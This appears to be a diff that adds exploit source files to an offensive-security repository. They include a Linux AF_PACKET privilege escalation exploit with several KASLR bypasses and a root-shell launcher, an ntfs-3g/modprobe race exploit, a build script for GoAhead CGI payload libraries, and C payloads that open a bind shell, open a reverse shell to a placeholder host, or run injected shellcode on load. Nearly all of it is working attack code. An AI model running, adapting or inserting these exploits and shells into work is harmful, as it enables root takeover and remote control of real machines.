+    *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+    if (*size == -1) {
+        dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
+        return false;
+    }
+
+    *size = (*size / getpagesize() + 1) * getpagesize();
+    *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
+                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+    *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+    if (*size == -1) {
+        dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
+        return false;
+    }
+
+    return true;
+}
+
+unsigned long get_kernel_addr_trusty(char* buffer, int size) {
+    const char* needle1 = "Freeing unused";
+    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+    if (substr == NULL) return 0;
+
+    int start = 0;
+    int end = 0;
+    for (end = start; substr[end] != '-'; end++);
+
+    const char* needle2 = "ffffff";
+    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+    if (substr == NULL) return 0;
+
+    char* endptr = &substr[16];
+    unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+    r &= 0xffffffffff000000ul;
+
+    return r;
+}
+
+unsigned long get_kernel_addr_xenial(char* buffer, int size) {
+    const char* needle1 = "Freeing unused";
+    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+    if (substr == NULL) {
+        return 0;
+    }
+
+    int start = 0;
+    int end = 0;
+    for (start = 0; substr[start] != '-'; start++);
+    for (end = start; substr[end] != '\n'; end++);
+
+    const char* needle2 = "ffffff";
+    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+    if (substr == NULL) {
+        return 0;
+    }
+
+    char* endptr = &substr[16];
+    unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+    r &= 0xfffffffffff00000ul;
+    r -= 0x1000000ul;
+
+    return r;
+}
+
+unsigned long get_kernel_addr_syslog() {
+    unsigned long addr = 0;
+    char* syslog;
+    int size;
+
+    dprintf("[.] trying syslog...\n");
+
+    if (!mmap_syslog(&syslog, &size))
+        return 0;
+
+    if (strstr(kernels[kernel].kernel_version, "14.04.1") != NULL)
+        addr = get_kernel_addr_trusty(syslog, size);
+    else
+        addr = get_kernel_addr_xenial(syslog, size);
+
+    if (!addr)
+        dprintf("[-] kernel base not found in syslog\n");
+
+    return addr;
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_kallsyms() {
+    FILE *f;
+    unsigned long addr = 0;
+    char dummy;
+    char sname[256];
+    char* name = "startup_64";
+    char* path = "/proc/kallsyms";
+
+    dprintf("[.] trying %s...\n", path);
+    f = fopen(path, "r");
+    if (f == NULL) {
+        dprintf("[-] open/read(%s)\n", path);
+        return 0;
+    }
+
+    int ret = 0;
+    while (ret != EOF) {
+        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+        if (ret == 0) {
+            fscanf(f, "%s\n", sname);
+            continue;
+        }
+        if (!strcmp(name, sname)) {
+            fclose(f);
+            return addr;
+        }
+    }
+
+    fclose(f);
+    dprintf("[-] kernel base not found in %s\n", path);
+    return 0;
+}
+
+// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_sysmap() {
+    FILE *f;
+    unsigned long addr = 0;
+    char path[512] = "/boot/System.map-";
+    char version[32];
+
+    struct utsname u;
+    u = get_kernel_version();
+    strcat(path, u.release);
+    dprintf("[.] trying %s...\n", path);
+    f = fopen(path, "r");
+    if (f == NULL) {
+        dprintf("[-] open/read(%s)\n", path);
+        return 0;
+    }
+
+    char dummy;
+    char sname[256];
+    char* name = "startup_64";
+    int ret = 0;
+    while (ret != EOF) {
+        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+        if (ret == 0) {
+            fscanf(f, "%s\n", sname);
+            continue;
+        }
+        if (!strcmp(name, sname)) {
+            fclose(f);
+            return addr;
+        }
+    }
+
+    fclose(f);
+    dprintf("[-] kernel base not found in %s\n", path);
+    return 0;
+}
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_mincore() {
+    unsigned char buf[getpagesize()/sizeof(unsigned char)];
+    unsigned long iterations = 20000000;
+    unsigned long addr = 0;
+
+    dprintf("[.] trying mincore info leak...\n");
+    /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+    if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
+        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+        dprintf("[-] mmap()\n");
+        return 0;
+    }
+
+    int i;
+    for (i = 0; i <= iterations; i++) {
+        /* Touch a mishandle with this type mapping */
+        if (mincore((void*)0x86000000, 0x1000000, buf)) {
+            dprintf("[-] mincore()\n");
+            return 0;
+        }
+
+        int n;
+        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+            addr = *(unsigned long*)(&buf[n]);
+            /* Kernel address space */
+            if (addr > 0xffffffff00000000) {
+                addr &= 0xffffffffff000000ul;
+                if (munmap((void*)0x66000000, 0x20000000000))
+                    dprintf("[-] munmap()\n");
+                return addr;
+            }
+        }
+    }
+
+    if (munmap((void*)0x66000000, 0x20000000000))
+        dprintf("[-] munmap()\n");
+
+    dprintf("[-] kernel base not found in mincore info leak\n");
+    return 0;
+}
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+    unsigned long addr = 0;
+
+    addr = get_kernel_addr_kallsyms();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_sysmap();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_syslog();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_mincore();
+    if (addr) return addr;
+
+    dprintf("[-] KASLR bypass failed\n");
+    exit(EXIT_FAILURE);
+
+    return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+void launch_rootshell(void)
+{
+    int fd;
+    char buf[256];
+    struct stat s;
+
+    fd = open(SYSCTL_PATH, O_WRONLY);
+
+    if(fd == -1) {
+        dprintf("[-] could not open %s\n", SYSCTL_PATH);
+        exit(EXIT_FAILURE);
+    }
+
+    memset(buf, '\x00', 256);
+
+    readlink("/proc/self/exe", (char *)&buf, 256);
+
+    write(fd, buf, strlen(buf)+1);
+
+    socket(AF_INET, SOCK_STREAM, 132);
+
+    if (stat(buf,&s) == 0 && s.st_uid == 0) {
+        dprintf("[+] binary executed by kernel, launching rootshell\n");
+        lseek(fd, 0, SEEK_SET);
+        write(fd, "/sbin/modprobe", 15);
+        close(fd);
+        execl(buf, buf, NULL);
+    } else {
+        dprintf("[-] could not create rootshell\n");
+        exit(EXIT_FAILURE);
+    }
+}
+
+void setup_sandbox() {
+    if (unshare(CLONE_NEWUSER) != 0) {
+        dprintf("[-] unshare(CLONE_NEWUSER)\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if (unshare(CLONE_NEWNET) != 0) {
+        dprintf("[-] unshare(CLONE_NEWNET)\n");
+        exit(EXIT_FAILURE);
+    }
+}
+
+int main(int argc, char **argv)
+{
+    int status, pid;
+    struct utsname u;
+    char buf[512], *f;
+
+    if (getuid() == 0 && geteuid() == 0) {
+        chown("/proc/self/exe", 0, 0);
+        chmod("/proc/self/exe", 06755);
+        exit(0);
+    }
+
+    if (getuid() != 0 && geteuid() == 0) {
+        setresuid(0, 0, 0);
+        setresgid(0, 0, 0);
+        execl("/bin/bash", "bash", "-p", NULL);
+        exit(0);
+    }
+
+    dprintf("linux AF_PACKET race condition exploit by rebel\n");
+
+    dprintf("[.] starting\n");
+
+    dprintf("[.] checking hardware\n");
+    check_procs();
+    dprintf("[~] done, hardware looks good\n");
+
+    dprintf("[.] checking kernel version\n");
+    detect_versions();
+    dprintf("[~] done, version looks good\n");
+
+#if ENABLE_KASLR_BYPASS
+    dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+    KERNEL_BASE = get_kernel_addr();
+    dprintf("[~] done, kernel text:     %lx\n", KERNEL_BASE);
+#endif
+
+    dprintf("[.] proc_dostring:         %lx\n", PROC_DOSTRING);
+    dprintf("[.] modprobe_path:         %lx\n", MODPROBE_PATH);
+    dprintf("[.] register_sysctl_table: %lx\n", REGISTER_SYSCTL_TABLE);
+    dprintf("[.] set_memory_rw:         %lx\n", SET_MEMORY_RW);
+
+    pid = fork();
+    if (pid == 0) {
+        dprintf("[.] setting up namespace sandbox\n");
+        setup_sandbox();
+        dprintf("[~] done, namespace sandbox set up\n");
+        wrapper();
+        exit(0);
+    }
+
+    waitpid(pid, &status, 0);
+
+    launch_rootshell();
+    return 0;
+}
@@ -0,0 +1,196 @@
+#define _GNU_SOURCE
+#include <stdbool.h>
+#include <errno.h>
+#include <sys/inotify.h>
+#include <unistd.h>
+#include <err.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <sys/eventfd.h>
+#include <signal.h>
+#include <poll.h>
+#include <stdio.h>
+#include <sys/prctl.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <sys/utsname.h>
+
+int main(void) {
+  /* prevent shell from backgrounding ntfs-3g when stopped */
+  pid_t initial_fork_child = fork();
+  if (initial_fork_child == -1)
+    err(1, "initial fork");
+  if (initial_fork_child != 0) {
+    int status;
+    if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)
+      err(1, "waitpid");
+    execl("rootshell", "rootshell", NULL);
+    exit(0);
+  }
+
+  char buf[1000] = {0};
+  // Set up workspace with volume, mountpoint, modprobe config and module directory.
+  char template[] = "/tmp/ntfs_sploit.XXXXXX";
+  if (mkdtemp(template) == NULL)
+    err(1, "mkdtemp");
+  char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];
+  sprintf(volume, "%s/volume", template);
+  sprintf(mountpoint, "%s/mountpoint", template);
+  sprintf(modprobe_confdir, "%s/modprobe.d", template);
+  sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);
+  if (mkdir(volume, 0777) || mkdir(mountpoint, 0777) || mkdir(modprobe_confdir, 0777))
+    err(1, "mkdir");
+  int conffd = open(modprobe_conffile, O_WRONLY|O_CREAT, 0666);
+  if (conffd == -1)
+    err(1, "open modprobe config");
+  int suidfile_fd = open("rootshell", O_RDONLY);
+  if (suidfile_fd == -1)
+    err(1, "unable to open ./rootshell");
+  char modprobe_config[200];
+  sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);
+  if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))
+    errx(1, "modprobe config write failed");
+  close(conffd);
+  // module directory setup
+  char system_cmd[1000];
+  sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",
+    template, template);
+  if (system(system_cmd))
+    errx(1, "shell command failed");
+
+  // Set up inotify watch for /proc/mounts.
+  // Note: /proc/mounts is a symlink to /proc/self/mounts, so
+  // the watch will only see accesses by this process.
+  int inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
+    err(1, "unable to watch /proc/mounts");
+
+  // Set up inotify watch for /proc/filesystems.
+  // This can be used to detect whether we lost the race.
+  int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (fs_inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
+    err(1, "unable to watch /proc/filesystems");
+
+  // Set up inotify watch for /sbin/modprobe.
+  // This can be used to detect when we can release all our open files.
+  int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
+  if (modprobe_inotify_fd == -1)
+    err(1, "unable to create inotify fd?");
+  if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
+    err(1, "unable to watch /sbin/modprobe");
+
+  int do_exec_pipe[2];
+  if (pipe2(do_exec_pipe, O_CLOEXEC))
+    err(1, "pipe");
+  pid_t child = fork();
+  if (child == -1)
+    err(1, "fork");
+  if (child != 0) {
+    if (read(do_exec_pipe[0], buf, 1) != 1)
+      errx(1, "pipe read failed");
+    char modprobe_opts[300];
+    sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);
+    setenv("MODPROBE_OPTIONS", modprobe_opts, 1);
+    execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
+  }
+  child = getpid();
+
+  // Now launch ntfs-3g and wait until it opens /proc/mounts
+  if (write(do_exec_pipe[1], buf, 1) != 1)
+    errx(1, "pipe write failed");
+
+  if (read(inotify_fd, buf, sizeof(buf)) <= 0)
+    errx(1, "inotify read failed");
+  if (kill(getppid(), SIGSTOP))
+    err(1, "can't stop setuid parent");
+
+  // Check whether we won the main race.
+  struct pollfd poll_fds[1] = {{
+    .fd = fs_inotify_fd,
+    .events = POLLIN
+  }};
+  int poll_res = poll(poll_fds, 1, 100);
+  if (poll_res == -1)
+    err(1, "poll");
+  if (poll_res == 1) {
+    puts("looks like we lost the race");
+    if (kill(getppid(), SIGKILL))
+      perror("SIGKILL after lost race");
+    char rm_cmd[100];
+    sprintf(rm_cmd, "rm -rf %s", template);
+    system(rm_cmd);
+    exit(1);
+  }
+  puts("looks like we won the race");
+
+  // Open as many files as possible. Whenever we have
+  // a bunch of open files, move them into a new process.
+  int total_open_files = 0;
+  while (1) {
+    #define LIMIT 500
+    int open_files[LIMIT];
+    bool reached_limit = false;
+    int n_open_files;
+    for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {
+      open_files[n_open_files] = eventfd(0, 0);
+      if (open_files[n_open_files] == -1) {
+        if (errno != ENFILE)
+          err(1, "eventfd() failed");
+        printf("got ENFILE at %d total\n", total_open_files);
+        reached_limit = true;
+        break;
+      }
+      total_open_files++;
+    }
+    pid_t fd_stasher_child = fork();
+    if (fd_stasher_child == -1)
+      err(1, "fork (for eventfd holder)");
+    if (fd_stasher_child == 0) {
+      prctl(PR_SET_PDEATHSIG, SIGKILL);
+      // close PR_SET_PDEATHSIG race window
+      if (getppid() != child) raise(SIGKILL);
+      while (1) pause();
+    }
+    for (int i = 0; i < n_open_files; i++)
+      close(open_files[i]);
+    if (reached_limit)
+      break;
+  }
+
+  // Wake up ntfs-3g and keep allocating files, then free up
+  // the files as soon as we're reasonably certain that either
+  // modprobe was spawned or the attack failed.
+  if (kill(getppid(), SIGCONT))
+    err(1, "SIGCONT");
+
+  time_t start_time = time(NULL);
+  while (1) {
+    for (int i=0; i<1000; i++) {
+      int efd = eventfd(0, 0);
+      if (efd == -1 && errno != ENFILE)
+        err(1, "gapfiller eventfd() failed unexpectedly");
+    }
+    struct pollfd modprobe_poll_fds[1] = {{
+      .fd = modprobe_inotify_fd,
+      .events = POLLIN
+    }};
+    int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);
+    if (modprobe_poll_res == -1)
+      err(1, "poll");
+    if (modprobe_poll_res == 1) {
+      puts("yay, modprobe ran!");
+      exit(0);
+    }
+    if (time(NULL) > start_time + 3) {
+      puts("modprobe didn't run?");
+      exit(1);
+    }
+  }
+}
@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,reverse,bind}
+   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so
@@ -0,0 +1,96 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _bind_tcp_shell(void) {
+
+  int sfd, fd, i;
+  struct sockaddr_in addr,saddr;
+  unsigned int saddr_len = sizeof(struct sockaddr_in);
+
+  char *lport = "55555";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  sfd = socket(AF_INET, SOCK_STREAM, 0);
+  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
+
+  saddr.sin_family = AF_INET;
+  saddr.sin_port = htons(atoi(lport));
+  saddr.sin_addr.s_addr = INADDR_ANY;
+  bzero(&saddr.sin_zero, 8);
+
+  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
+    exit(1);
+  }
+
+  if (listen(sfd, 5) == -1) {
+    close(sfd);
+    exit(1);
+  }
+
+  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
+  close(sfd);
+
+  if (fd == -1) {
+    exit(1);
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _bind_tcp_shell();
+
+    exit(0);
+}
@@ -0,0 +1,84 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _reverse_tcp_shell(void) {
+
+  int fd, i;
+  struct sockaddr_in addr;
+  char *lport = "55555";
+  char *lhost = "000.000.000.000";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  fd = socket(PF_INET, SOCK_STREAM, 0);
+  addr.sin_port = htons(atoi(lport));
+  addr.sin_addr.s_addr = inet_addr(lhost);
+  addr.sin_family = AF_INET;
+
+  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
+
+  for (i=0; i<10; i++) {
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
+      break;
+    }
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _reverse_tcp_shell();
+
+    exit(0);
+}
@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+  void *mem;
+  void (*fn)();
+
+  unsetenv("LD_PRELOAD");
+
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork())
+    fn();
+
+  exit(0);
+}
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .3.3
 .6.2